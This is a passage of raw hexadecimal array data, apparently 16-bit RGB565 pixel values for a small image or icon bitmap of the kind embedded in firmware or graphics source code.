0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffdf, 0xfffe, 0xffbf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffbf, 0xffbe, 0xfffe, 0xfffd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffdd, 0xffdd, 0xffdd, 0xff9c, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffbd, 0xffde, 0xffff, 0xffff, 0xffde, 0xffde, 0xffbf, 0xffff, 0xf7ff, 0xe7ff, 0xd7ff, 0xbf7f, 0xaefe, 0x8e3b, 0x6d79, 0x5d18, 0x6539, 0x6d59, 0x85db, 0x9e9c, 0xb73e, 0xcfff, 0xcfff, 0xe7ff, 0xf7fe, 0xffdd, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffdf, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xefff, 0xeffe, 0xf7fe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffd, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xefff, 0xdfff, 0xd7ff, 0xcfff, 0xbf9f, 0xbf9f, 0xc7df, 0xc7df, 0xd7ff, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xff9d, 0xffff, 0xdfdf, 0xa71f, 0x559c, 0x2c99, 0x1395, 0x1353, 0x1352, 0x1b93, 0x1b93, 0x23b4, 0x1b53, 0x1b33, 0x1b34, 0x1b75, 0x23f8, 0x3d1b, 0x7e5d, 0xd7ff, 0xf7ff, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffdf, 0xfffe, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xeffe, 0xe7ff, 0xe7fe, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7de, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffd, 0xfffd, 0xffde, 0xf7ff, 0xdfff, 0xa75f, 0x7e7e, 0x451a, 0x2c98, 0x2417, 0x1c17, 0x0bf6, 0x0bf5, 0x1456, 0x1c57, 0x3cb9, 0x659c, 0x9edf, 0xc7bf, 0xefff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xefdf, 0xefdf, 0xffff, 0xfffe, 0xf7ff, 0xefff, 0x96be, 0x4475, 0x1b73, 0x1353, 0x23f6, 0x3c99, 0x659c, 0x8e9f, 0xa71f, 0xa73f, 0xaf5f, 0xaf3f, 0x9edf, 0x861f, 0x4cdb, 0x2bd7, 0x1374, 0x1b72, 0x2bb3, 0x655a, 0xc7bf, 0xefff, 0xf7ff, 0xfffd, 0xfffe, 0xffde, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7df, 0xffbf, 0xffdf, 0xffde, 0xf7bd, 0xfffe, 0xffdd, 0xf7fe, 0xef9f, 0xefdf, 0x7493, 0xd7ff, 0xe7ff, 0xffff, 0xff9e, 0xffde, 0xf7de, 0xefff, 0xefbf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7be, 0xfffe, 0xfffe, 0xf7fe, 0xefbe, 0xe7ff, 0xcfff, 0x761b, 0x3456, 0x1394, 0x0b73, 0x13b4, 0x1bd4, 0x3436, 0x3cb8, 0x3cd9, 0x34d8, 0x2cb8, 0x2436, 0x1394, 0x1374, 0x1b54, 0x2bb4, 0x4cb7, 0x9ebd, 0xdfff, 0xefff, 0xf7fe, 0xfffe, 0xf7fe, 0xffdf, 0xffbf, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xfffd, 0xf7ff, 0xa6ff, 0x2459, 0x03b4, 0x0b52, 0x54b6, 0xaebd, 0xdfdf, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xbf3e, 0x7598, 0x2bf5, 0x0bb7, 0x0b97, 0x657c, 0xe7ff, 0xf7ff, 0xffff, 0xffbf, 0xff9e, 0xffbe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xffff, 0xffbf, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xf7de, 0xf7bd, 0xf7ff, 0xc6df, 0x11cc, 0xaebc, 0xefff, 0xf79e, 0xffbe, 0xfffe, 0xf7ff, 0xd79d, 0xefff, 0xf7df, 0xffbf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffdc, 0xfffd, 0xf7ff, 0xcfff, 0x65bc, 0x0bb5, 0x0374, 0x1bb4, 0x4c97, 0x963c, 0xbf3e, 0xdfdf, 0xefff, 0xefff, 0xe7ff, 0xe7ff, 0xe7ff, 0xe7ff, 0xcfbf, 0xaebf, 0x755a, 0x2bd6, 0x1395, 0x0b94, 0x3456, 0x9ede, 0xefff, 0xffdf, 0xfffd, 0xffde, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xf7dc, 0xffff, 0xe7ff, 0x6518, 0x0b54, 0x0bf7, 0x4539, 0xb7bf, 0xefff, 0xffff, 0xffdd, 0xfffd, 0xfffd, 0xffde, 0xffdf, 0xffdf, 0xfffe, 0xfffe, 0xfffd, 0xf7dc, 0xffdd, 0xffdd, 0xfffe, 0xf7ff, 0xcfff, 0x65ff, 0x1bf9, 0x1375, 0x2bb4, 0xbf5f, 0xefff, 0xf7df, 0xff9f, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xf7ff, 0x42ef, 0x7cf9, 0xe7ff, 0xefff, 0xfffe, 0xffdf, 0x4b12, 0x098c, 0x32ad, 0xf7ff, 0xfffe, 0xffdf, 0xefdf, 0x95ba, 0x2a8c, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffbc, 0xf7fe, 0xe7ff, 0x967e, 0x1b75, 0x0bb6, 0x1c17, 0x761e, 0xc7bf, 0xefff, 0xf7ff, 0xffde, 0xffdd, 0xfffe, 0xffde, 0xffde, 0xffde, 0xfffd, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xdfff, 0xa75f, 0x4519, 0x13b4, 0x1332, 0x5475, 0xc77f, 0xf7ff, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xeffd, 0xcfff, 0x33f6, 0x13b7, 0x3416, 0xa71e, 0xe7ff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7fd, 0xfffd, 0xfffd, 0xff7d, 0xffdf, 0xefff, 0xe7ff, 0xcfdf, 0x653a, 0x0b12, 0x23d4, 0x8e7d, 0xefff, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xfffd, 0xf7ff, 0x7499, 0x11f0, 0x3b31, 0xdfff, 0xffbe, 0xffff, 0x9dda, 0x8559, 0x8d98, 0xefff, 0xfffd, 0xf7ff, 0x6bf6, 0x19d0, 0x5bd4, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xdfff, 0x5d39, 0x1395, 0x1395, 0x6dbb, 0xcfdf, 0xefff, 0xffff, 0xffdf, 0xffdd, 0xffdd, 0xffbe, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffd, 0xffdc, 0xfffd, 0xffbf, 0xffdf, 0xffdf, 0xf7ff, 0xe7ff, 0xa71f, 0x4497, 0x1b73, 0x2c16, 0xa67d, 0xefff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7fe, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xefff, 0xcfff, 0x33f4, 0x0b76, 0x44ba, 0xd7df, 0xfffe, 0xffdd, 0xffbd, 0xffff, 0xf7df, 0xefff, 0xd7df, 0x8dfb, 0x64b7, 0x5c97, 0x5c96, 0x64b7, 0x859a, 0xcf7f, 0xefff, 0xf7ff, 0xf7ff, 0xffdf, 0xffbe, 0xfffe, 0xffdd, 0xffde, 0xefff, 0x969d, 0x13b4, 0x0b73, 0x863c, 0xefff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xffff, 0xadfc, 0x118d, 0x53f4, 0xdfff, 0xf7ff, 0xdfbf, 0xc79f, 0xc7ff, 0xc7df, 0xd7ff, 0xe7ff, 0xe7ff, 0x6c57, 0x21ef, 0x73f6, 0xffff, 0xf7dd, 0xf7fd, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 